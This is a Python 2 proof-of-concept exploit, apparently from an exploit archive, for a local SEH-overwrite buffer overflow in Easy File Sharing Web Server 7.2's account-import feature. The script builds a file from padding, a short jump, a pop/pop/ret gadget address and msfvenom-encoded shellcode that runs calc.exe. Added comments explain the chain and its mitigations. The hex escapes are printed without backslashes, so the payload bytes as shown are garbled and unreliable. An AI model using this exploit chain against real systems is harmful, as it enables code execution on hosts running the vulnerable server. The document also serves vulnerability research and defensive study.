Easy File Sharing Web Server 7.2 Account Import Buffer Overflow
Posted on 01 July 2017
#!/usr/bin/python
##################################
# 2017/6/17 Chako
#
# EFS Web Server 7.2 - Local Buffer Overflow(SEH)
# Tested on: Windows XP SP3 EN (DEP Off)
# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
#
# Description:
# When importing a large user account file on to EFS Web Server 7.2
# will trigger the vuln.
##################################
#
# Proof-of-concept generator: builds a single file (exploit.txt) whose
# contents are padding, an SEH-record overwrite and an encoded payload, to be
# fed to the account-import feature named above. This is a Python 2 script
# (print statement below).
import struct

# Payload as recorded by the author. The "-v Shellcode" / "-f python" flags
# explain the variable name and the "Shellcode +=" layout that follows; the
# payload itself only launches calc.exe per the command line.
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v Shellcode -f python
#
# NOTE(review): in this listing every hex escape appears as "x89", "xe5", ...
# with no backslash, so as printed these strings contain literal ASCII
# letters and digits rather than the encoded bytes — presumably the
# backslashes were lost when the page was extracted. Confirm against the
# original file before drawing any conclusion about byte values or lengths.
Shellcode = ""
Shellcode += "x89xe5xdbxd8xd9x75xf4x5fx57x59x49x49"
Shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
Shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
Shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
Shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
Shellcode += "x59x6cx59x78x4dx52x75x50x57x70x43x30"
Shellcode += "x55x30x6dx59x4bx55x55x61x6fx30x53x54"
Shellcode += "x6ex6bx56x30x30x30x6cx4bx53x62x44x4c"
Shellcode += "x6cx4bx36x32x72x34x4ex6bx34x32x75x78"
Shellcode += "x44x4fx6dx67x50x4ax47x56x34x71x6bx4f"
Shellcode += "x6ex4cx37x4cx31x71x53x4cx57x72x56x4c"
Shellcode += "x55x70x7ax61x48x4fx44x4dx73x31x78x47"
Shellcode += "x39x72x39x62x63x62x71x47x4ex6bx66x32"
Shellcode += "x46x70x6cx4bx51x5ax37x4cx4cx4bx62x6c"
Shellcode += "x46x71x53x48x58x63x32x68x57x71x38x51"
Shellcode += "x70x51x6ex6bx62x79x71x30x66x61x58x53"
Shellcode += "x4ex6bx57x39x34x58x39x73x67x4ax47x39"
Shellcode += "x4cx4bx50x34x4ex6bx36x61x39x46x45x61"
Shellcode += "x6bx4fx4cx6cx6bx71x78x4fx66x6dx56x61"
Shellcode += "x6bx77x34x78x4bx50x74x35x6bx46x37x73"
Shellcode += "x33x4dx38x78x67x4bx43x4dx67x54x43x45"
Shellcode += "x59x74x63x68x4cx4bx70x58x46x44x67x71"
Shellcode += "x6bx63x72x46x6cx4bx34x4cx52x6bx6cx4b"
Shellcode += "x33x68x37x6cx55x51x49x43x4cx4bx55x54"
Shellcode += "x4ex6bx63x31x6ax70x6bx39x53x74x35x74"
Shellcode += "x57x54x73x6bx61x4bx53x51x50x59x33x6a"
Shellcode += "x62x71x79x6fx4dx30x51x4fx33x6fx33x6a"
Shellcode += "x6cx4bx37x62x5ax6bx6cx4dx31x4dx71x7a"
Shellcode += "x57x71x4ex6dx4fx75x6cx72x43x30x77x70"
Shellcode += "x73x30x50x50x42x48x56x51x4ex6bx52x4f"
Shellcode += "x4ex67x6bx4fx68x55x4fx4bx48x70x6fx45"
Shellcode += "x6cx62x50x56x52x48x4dx76x4ax35x4fx4d"
Shellcode += "x6dx4dx49x6fx58x55x55x6cx33x36x61x6c"
Shellcode += "x74x4ax6bx30x69x6bx4dx30x74x35x54x45"
Shellcode += "x4dx6bx47x37x62x33x72x52x70x6fx32x4a"
Shellcode += "x63x30x56x33x59x6fx4ex35x33x53x63x51"
Shellcode += "x52x4cx33x53x44x6ex73x55x72x58x65x35"
Shellcode += "x77x70x41x41"

#SEH record (nseh field) at 0x0012b318 overwritten with normal pattern (offset 2563)
# Filler: 2563 bytes of padding place the following four bytes exactly over
# the nSEH field (offset taken from the author's note above).
Junk = "x41" * 2563
# nSEH: the intended bytes are EB 0F 90 90 — a short jump (+15) over the
# handler address into the NOP sled below. Same stripped-backslash caveat as
# the shellcode: as printed this is eight literal characters.
nSEH = "xEBx0Fx90x90"
# 0x10012f3b : pop esi # pop ebx # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False
# SEH handler address: a pop/pop/ret gadget in ImageLoad.dll, and the only
# value in this script that is genuinely packed as bytes (little-endian u32).
# Defender's note: the module flags recorded above (no ASLR, no rebase, no
# SafeSEH) are exactly what makes this gadget usable, and the payload runs
# from the overflowed buffer, which is why the header says "DEP Off". A
# SafeSEH/ASLR-built module, SEHOP on the host, or DEP each break a link in
# this chain.
SEH = struct.pack("<L", 0x10012f3b)
# Short NOP sled placed on both sides of the payload ("x90" is literal text
# here too, because of the stripped backslashes).
NOP = "x90" * 10
# Final layout: padding | nSEH | SEH | sled | shellcode | sled
BoF = Junk + nSEH + SEH + NOP + Shellcode + NOP
# Python 2 print statement: reports the total payload length for reference.
print len(BoF)
# Write the payload to exploit.txt in the current working directory. The file
# is opened in text mode ("w"); on Windows that translates 0x0A bytes — none
# appears among the bytes listed here, but "wb" is the safer mode for binary
# payloads. The handle is closed explicitly rather than via a with-block.
f = open ("exploit.txt", "w")
f.write(BoF)
f.close()